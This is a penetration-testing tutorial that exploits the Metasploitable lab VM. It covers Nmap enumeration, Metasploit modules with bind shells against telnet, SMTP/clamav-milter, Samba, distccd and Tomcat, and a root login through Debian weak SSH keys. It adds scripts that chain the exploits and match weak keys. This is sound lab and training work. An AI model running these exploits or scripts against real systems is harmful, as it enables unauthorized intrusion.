*************
0x00 Overview
*************
Today I'll be writing a guide on how to exploit Metasploitable with the Metasploit Framework. Who is this tutorial for? Anyone who is interested in beginning a journey as a Penetration Tester. This tutorial will cover:
- An overview of how to use the Metasploit Framework: searching for modules, using them, and launching exploits.
- How to scan a target and exploit its running services with the MSF.
- How to use one public exploit, explained later.
The VM I'm booting is specifically designed to be exploited with Metasploit, but I will also be using one public exploit from
http://www.exploit-db.com/ that I have used personally in the past.
Victim's IP Address: 192.168.1.6
Attacker's IP Address: 192.168.1.10
NOTE: BT4-R2 is what I will be using to exploit the VM. BT-4 Final does not yield the same results, so keep that in mind. Without further ado, let's begin…
***************
0x01 Enumeration
***************
The most important part of any Penetration Test is Enumeration: the information you gather here is what you will use to plan the attack against your target.
- First let's start off with a simple Nmap scan to reveal the open ports and running services of our target.
As Pen-Testers, we need to understand what these services do, and we also need to familiarise ourselves with the commonly running services for future audits.
Some common services include, but are not limited to:
- FTP
- Telnet
- SSH
- IMAP
- POP3
- MySQL
These services run as daemons and show up on the majority of targets.
An Nmap scan will not necessarily show EVERY open port: by default Nmap only probes the 1000 most common ports, so add -p- to cover all 65535 when time allows. For the same reason I also ran Nessus against the target to catch anything Nmap did not report.
NOTE: Operating System identification is essential for choosing payloads, and some exploits depend on it. This VM is NOT Windows, so we need *nix payloads rather than Windows payloads if we want a session when an exploit succeeds. Nmap's -O option gives you an OS guess; the service banners below (Debian/Ubuntu package versions everywhere) already tell the story here.
To scan the running services on the Metasploitable machine (192.168.1.6), I'll do a SYN stealth scan (which needs root, since it crafts raw packets) with version detection:
nmap -sS -sV 192.168.1.6
Code:
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
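Reading a port list by eye works for one host, but the same triage is worth scripting once you scan a range. The shell function below is an added example, not part of the original post or of Nmap: it reads Nmap's grepable output (what you get from -oG), prints one line per open port, and flags the cleartext protocols named in the list above (ftp, telnet, pop3, imap) so the sniffing-friendly services stand out. The sample scan line is constructed to mirror the results above (Nmap writes a "/" inside a field as "|", hence PHP|5.2.4); the CLEARTEXT label and the function name are mine.

```shell
#!/bin/sh
# Added example: triage Nmap grepable (-oG) output.
# Each "Host:" line carries tab-separated sections; the "Ports:" section is a
# comma-separated list of port/state/proto/owner/service/rpc/version/ entries.

# Usage: nmap_triage < scan.gnmap
# Prints "host port service version [CLEARTEXT]" for every open port.
nmap_triage() {
    awk -F '\t' '
    /Ports:/ {
        split($1, h, " ")              # "Host: 192.168.1.6 ()" -> h[2] is the address
        host = h[2]
        ports = ""
        for (i = 2; i <= NF; i++)
            if ($i ~ /^Ports: /) ports = substr($i, 8)
        n = split(ports, p, ", ")
        for (j = 1; j <= n; j++) {
            split(p[j], f, "/")        # f[1]=port f[2]=state f[5]=service f[7]=version
            if (f[2] != "open") continue
            # Protocols that carry credentials in the clear deserve a flag
            flag = (f[5] ~ /^(ftp|telnet|pop3|imap)$/) ? " CLEARTEXT" : ""
            printf "%s %s %s %s%s\n", host, f[1], f[5], f[7], flag
        }
    }'
}

# Constructed sample in -oG format, mirroring the scan above (one filtered
# port added to show that only open ports are reported).
SAMPLE_OG=$(printf '%s\t%s\t%s' \
  'Host: 192.168.1.6 ()' \
  'Ports: 21/open/tcp//ftp//ProFTPD 1.3.1/, 22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)/, 23/open/tcp//telnet//Linux telnetd/, 25/filtered/tcp//smtp///, 80/open/tcp//http//Apache httpd 2.2.8 ((Ubuntu) PHP|5.2.4-2ubuntu5.10 with Suhosin-Patch)/, 3632/open/tcp//distccd//distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))/' \
  'Ignored State: closed (994)')

# Example run on the constructed sample (for a real scan: nmap -sS -sV -p- -oG scan.gnmap <target>)
printf '%s\n' "$SAMPLE_OG" | nmap_triage
```

Feed it a real file with `nmap_triage < scan.gnmap`; because it keys on the state field, a full-range scan (-p-) drops straight in without changes.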
***************************
0x02 Exploiting Running Services
***************************
Based on the Nmap scan, we can see several running services. For each one below the pattern is the same: search for a module, set its options, pick a payload, launch.
----------------------------------
Exploiting Telnet : Port 23
----------------------------------
Let's begin by exploiting Telnet!
- Telnet provides an unencrypted channel between client and server: the login credentials and everything typed afterwards cross the wire in cleartext, so anyone who can get on-path (for example with ARP cache poisoning on the local segment) can read them.
Now that we have a potentially vulnerable service, let's open ./msfconsole and search for the available exploits.
NOTE: Updating the Metasploit Framework is not necessary for this tutorial; if left un-updated, you will get the same results.
On the MSF console type:
search telnet
The exploit we will be using is solaris/telnet/fuser, a Telnet Remote Authentication Bypass exploit. It targets the Solaris in.telnetd "-f" bug (CVE-2007-0882), where a username sent through the telnet USER environment option ends up as "login -f <user>" and skips the password prompt. Metasploitable's Linux telnetd is a different codebase, so if this module hands you a session, verify it with a command such as id before building on it. To use the exploit, type:
use solaris/telnet/fuser
Now we need to set the options for this exploit in order for it to work properly. To see the options you need to set, type:
show options
Now continue to set the specifications for this exploit:
set RHOST 192.168.1.6
set RPORT 23
set USER bin
The default remote port is 23 and the default username to use is bin.
Now that we have everything set for the exploit, we need to choose a payload. The payload I will be using is cmd/unix/bind_perl: a bind shell that listens on the target (LPORT 4444 by default) and runs under Perl, which every Debian/Ubuntu box ships with. A host firewall on the target would block a bind shell; in that case a reverse payload such as cmd/unix/reverse_perl, which connects back to your LHOST, is the alternative. You can pick your own by typing show payloads to see the other payloads available for this exploit. To use that payload we type:
set payload cmd/unix/bind_perl
Now we need to set the requirements for the payload as well, if that is not done for you:
show options
set RHOST 192.168.1.6
Now that we have everything set for both the exploit and the payload, the last step is simply to call exploit to launch it. Typing:
exploit
will launch the exploit and, as you can see, it was successful!
--------------------------------------------
Exploiting Postfix SMTPd : Port 25
--------------------------------------------
Let's continue by exploiting another running service, in this case SMTP.
- Without going into too much detail, the Postfix SMTP server receives mail from the network. It can be heavily spammed and exposed to junk mail and viruses, which is why an anti-virus milter (ClamAV) is hooked into it, and that milter is where the bug we use lives.
On the MSF console type:
search smtp
The exploit we will be using is unix/smtp/clamav_milter_blackhole, a remote code execution exploit. The flaw is not in Postfix itself but in the ClamAV milter (clamav-milter) that scans mail for the MTA: in black-hole mode the milter passes the recipient address to a shell without sanitising it, so a crafted recipient in RCPT TO gives command execution. To use that exploit, type:
use unix/smtp/clamav_milter_blackhole
Now, just like before, we need to set the options for this exploit in order for it to work properly. Again, to see the options you need to set, type show options, and continue to set the specifications for this exploit:
set RHOST 192.168.1.6
set RPORT 25
The default remote port is 25, and these are the only options we are interested in setting.
Now that we have everything set for the exploit, let's choose a payload. The payload I will be using is cmd/unix/bind_ruby. Be sure to specify that's the payload you will be utilising by typing:
set payload cmd/unix/bind_ruby
Once again, we need to set the requirements for the payload:
show options
set RHOST 192.168.1.6
Now that everything is set, typing:
exploit
will launch the exploit successfully!
------------------------------------------------
Exploiting Samba SMBd 3.x : Port 139
------------------------------------------------
The next service to be exploited lies on port 139.
- Understanding network protocols is essential to network penetration testing. Samba is the product name; what we need to understand is SMB. Server Message Block is the protocol used for sharing files and printers between computers, and Samba is the Unix implementation of it.
Let's search for Samba exploits by typing:
search samba
The exploit we will be using is multi/samba/usermap_script, a command execution exploit: Samba 3.0.20 through 3.0.25rc3 with the "username map script" smb.conf option enabled passes the client-supplied username to a shell, so shell metacharacters in the username run as the user smbd runs as (root on this VM, as the resulting session shows). To use that exploit, type:
use multi/samba/usermap_script
Let's continue by setting the exploit requirements we are interested in:
set RHOST 192.168.1.6
set RPORT 139
The default remote port is 139. Now let's choose our desired payload. The payload I'll be using is cmd/unix/bind_ruby. Let's set the payload, set its options, and launch the exploit:
set payload cmd/unix/bind_ruby
show options
set RHOST 192.168.1.6
exploit
Exploit successful.
--------------------------------------
Exploiting distccd : Port 3632
--------------------------------------
Remember the Nessus scan we ran prior to exploitation? It also flagged distccd on 3632/tcp, which Nmap listed above without saying much about it; the Nessus plugin is what explained what the service is and why it matters.
- Simply put, distcc is a program designed to distribute compiling tasks across a network to participating hosts.
The Nessus scan describes it as...
- Distcc is a program to distribute builds of C, C++, Objective C or Objective C++ code across several machines on a network. Distcc should always generate the same results as a local build, is simple to install and use, and is often two or more times faster than a local compile. Distcc by default trusts its clients completely, which in turn could allow a malicious client to execute arbitrary commands on the server.
Let's search for anything related to this service by typing:
search distccd
The exploit I'll be using for this service is unix/misc/distcc_exec, the DistCC Daemon Command Execution exploit: the daemon runs whatever compiler command line a client hands it, so a "compile job" can simply be a shell command. Now let's repeat the previous steps all in one, including choosing the payload, to save time.
use unix/misc/distcc_exec
show options
set RHOST 192.168.1.6
set RPORT 3632
set payload cmd/unix/bind_ruby
show options
set RHOST 192.168.1.6
exploit
By default the port is 3632, so setting RPORT was belt and braces. As you can see, the exploit succeeded.
---------------------------------------------------------------
Exploiting Apache Tomcat/Coyote JSP Engine 1.1
---------------------------------------------------------------
I left Apache Tomcat for last because I had to use an auxiliary module to get the username and password, and then an exploit to break into the VM.
First let's start with the auxiliary module by typing:
search tomcat
The auxiliary I'll be using is scanner/http/tomcat_mgr_login, which brute-forces the Tomcat Application Manager login using the Tomcat user and password lists bundled with Metasploit. To use it we type:
use scanner/http/tomcat_mgr_login
Now the only option we need to set is the remote host, then launch the module. Do check the RPORT shown by show options first: Metasploitable's Tomcat listens on 8180, so set RPORT 8180 if your copy of the module defaults to 8080.
set RHOSTS 192.168.1.6
exploit
If you scroll up to the green [+] line you can see that the credentials found are tomcat:tomcat, a well-known default pair.
Now how can we use this to our advantage? We can either browse to the manager application on the target and log in with those credentials, or exploit it further and get a shell.
Once again we type search tomcat, and find this exploit: multi/http/tomcat_mgr_deploy, Tomcat's Application Manager Deployer (Upload and Execute). It logs into the manager with the credentials we recovered, deploys a WAR file carrying the payload, and then requests it, so whatever user Tomcat runs as is the user you get. Sounds good enough to test! Now let's use that exploit, set the specifications, choose a payload, set its requirements and launch the exploit:
use multi/http/tomcat_mgr_deploy
show options
set RHOST 192.168.1.6
set RPORT 8180
set USERNAME tomcat
set PASSWORD tomcat
set payload generic/shell_bind_tcp
show options
set RHOST 192.168.1.6
exploit
As expected, we have a shell against the target.
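Every section above follows the same use / set / set payload / exploit rhythm, and Metasploit can replay exactly that from a resource script (msfconsole -r). The shell function below is an added example and not part of the original post or of the Metasploit Framework: it writes such a script covering the six modules used above, with the target set once via setg, each bind shell given its own LPORT so they do not collide on the target, and the Tomcat modules pointed at 8180. The file name metasploitable.rc and the helper names are mine; the module names, options and target address are the ones used on this page.

```shell
#!/bin/sh
# Added example: generate a Metasploit resource script that replays the
# module/option/payload sequence from this walkthrough, so the whole lab
# can be re-run with:  msfconsole -q -r metasploitable.rc

# Usage: write_metasploitable_rc [path] [target]
# Writes the resource script and prints its path.
write_metasploitable_rc() {
    rc=${1:-metasploitable.rc}
    target=${2:-192.168.1.6}
    cat > "$rc" <<EOF
# Set the target once, globally, instead of per module
setg RHOST $target
setg RHOSTS $target

# Telnet: Solaris in.telnetd -f bypass module (verify any session it returns)
use exploit/solaris/telnet/fuser
set RPORT 23
set USER bin
set PAYLOAD cmd/unix/bind_perl
set LPORT 4441
exploit -j -z

# SMTP: command injection through clamav-milter in black-hole mode
use exploit/unix/smtp/clamav_milter_blackhole
set RPORT 25
set PAYLOAD cmd/unix/bind_ruby
set LPORT 4442
exploit -j -z

# Samba "username map script" command injection
use exploit/multi/samba/usermap_script
set RPORT 139
set PAYLOAD cmd/unix/bind_ruby
set LPORT 4443
exploit -j -z

# distccd executes the compiler command line the client sends
use exploit/unix/misc/distcc_exec
set RPORT 3632
set PAYLOAD cmd/unix/bind_ruby
set LPORT 4444
exploit -j -z

# Tomcat manager: brute-force the login first (8180 on this VM, not 8080)
use auxiliary/scanner/http/tomcat_mgr_login
set RPORT 8180
run

# ...then deploy a payload WAR with the recovered credentials
use exploit/multi/http/tomcat_mgr_deploy
set RPORT 8180
set USERNAME tomcat
set PASSWORD tomcat
set PAYLOAD generic/shell_bind_tcp
set LPORT 4445
exploit -j -z

# Show what came back; attach to one with "sessions -i <id>"
sessions -l
EOF
    printf '%s\n' "$rc"
}

# Sanity check: how many modules the generated script drives
rc_module_count() {
    grep -c '^use ' "$1"
}

# Example run
write_metasploitable_rc metasploitable.rc 192.168.1.6
```

"exploit -j -z" runs each module as a background job and does not drop you into the session, so the script keeps going; the bind ports are only a convention here, any free port on the target works as long as each payload gets a different one.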
----------------------------------
Launching a Public Exploit
----------------------------------
Now let's do some snooping around. Based on the Nmap scan, we know that the target runs SSH, so what we are interested in is the authorized keys. Each account keeps its own list in ~/.ssh/authorized_keys; for root that is /root/.ssh/authorized_keys.
Here is more information about SSH authorized keys:
- AuthorizedKeysFile (in sshd_config) specifies the file containing the public keys used for public key authentication. It lists the public keys (RSA/DSA) that can be used for logging in as this user.
Let's go ahead and read this file by catting out the output:
cat /root/.ssh/authorized_keys
As you can see, there it is. The exploit we are going to launch is located here:
http://www.exploit-db.com/exploits/5622/
However, we are not going to be using the code. This system has weak SSH keys: as described in that exploit's write-up, the OpenSSL package Debian shipped from 2006 to May 2008 (CVE-2008-0166) seeded its random number generator with little more than the process ID, so every key generated on an affected system is one of about 32,768 possibilities per key type, size and architecture. The full set can be pregenerated and searched rather than brute-forced.
We can download these RSA keys from here:
http://sugar.metasploit.com/debian_ssh_r...86.tar.bz2
http://exploit-db.com/sploits/debian_ssh...86.tar.bz2
Now in a new terminal, run tar jxvf on the downloaded archive to extract the keys under /root/, then type:
cd /root/rsa/2048
Back on the shell we have in MSF, let's grab the entire key, which will be:
AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w
We need to find this among the keys we extracted. On the terminal we type:
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
to find the exact match: -l prints only the names of matching files and -r would recurse into subdirectories if there were any. The blob contains + and /, so adding -F (fixed-string match) is the safer form. This finds the public RSA key whose private half we will use to authenticate as root. This is the result you get:
57c3115d77c56390332dc5c49978627a-5429.pub
That name is the identity file: the archive names each key by a hash and the PID it was generated under, and the private key sits beside the .pub under the same name minus the extension. Now we simply type:
ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.6
And we are in as root :)
If ssh refuses the key because of loose file permissions, chmod 600 it first; and a current OpenSSH client (8.8 or later) will also need -o PubkeyAcceptedAlgorithms=+ssh-rsa -o HostKeyAlgorithms=+ssh-rsa to talk to an OpenSSH 4.7 server at all.
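The grep above handles one key by hand; a target with several entries in authorized_keys, or several users' files pulled from a shell, calls for the same check in a loop. The script below is an added example, not part of the original post or of the exploit-db entry: it reads every entry of a captured authorized_keys, fixed-string matches the base64 blob against a directory of candidate .pub files, and prints the private key to pass to ssh -i, skipping comments, keys outside the set, and any .pub whose private half is missing. It assumes the candidate directory holds pairs named <name> and <name>.pub, as the weak-key archive does; the fixture it builds is constructed, with fake base64 blobs, and is not real key material.

```shell
#!/bin/sh
# Added example: match a captured authorized_keys against a set of
# pregenerated key pairs and report the private keys that will log in.

# Usage: find_weak_keys <authorized_keys> <keydir>
# Prints the private key path for each entry that has a matching .pub.
find_weak_keys() {
    authkeys=$1
    keydir=$2
    while read -r ktype blob comment; do
        # Skip blank lines and comments; field 2 is the base64 blob.
        # (Entries with a leading option list such as from="..." are not handled.)
        case "$ktype" in ''|'#'*) continue ;; esac
        # -F: fixed string (the blob holds + and /), -l: file names only,
        # --: guard against a blob that begins with a dash
        match=$(grep -lF -- "$blob" "$keydir"/*.pub 2>/dev/null | head -n 1)
        [ -n "$match" ] || continue
        priv=${match%.pub}
        # No private half means nothing to log in with; report only usable keys
        [ -f "$priv" ] && printf '%s\n' "$priv"
    done < "$authkeys"
}

# Constructed fixture (fake blobs, fake names in the <hash>-<pid> style of the
# archive) so the function can be exercised offline. Prints the fixture directory.
make_fixture() {
    d=$(mktemp -d)
    mkdir "$d/keys"
    printf 'ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAfake/one+blob==\n' > "$d/keys/0123abcd-1001.pub"
    : > "$d/keys/0123abcd-1001"
    printf 'ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAfake/two+blob==\n' > "$d/keys/4567ef01-2002.pub"
    : > "$d/keys/4567ef01-2002"
    # A .pub with no private half: must never be reported
    printf 'ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAfake/three+blob==\n' > "$d/keys/89ab2345-3003.pub"
    # The captured authorized_keys: a key outside the set, a comment, one weak key
    {
        printf 'ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAstrong/key+not/in/set== admin@elsewhere\n'
        printf '# provisioning key\n'
        printf 'ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAfake/two+blob== root@metasploitable\n'
    } > "$d/authorized_keys"
    printf '%s\n' "$d"
}

# Example run on the fixture; against a real capture:
#   find_weak_keys ./authorized_keys /root/rsa/2048
fixture=$(make_fixture)
find_weak_keys "$fixture/authorized_keys" "$fixture/keys"
```

Each path it prints is ready for `ssh -i <path> user@target`; run it once per user whose authorized_keys you could read, since the weak key is whichever account installed it, not necessarily root.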
***************
0x03 Final Words
***************
Well, this is the end of this tutorial. Overall, using Metasploitable is a great way to learn how to use Metasploit and some of its features. There are other lab environments that provide the same penetration challenge through different methodologies. With that being said, I'll conclude this tutorial.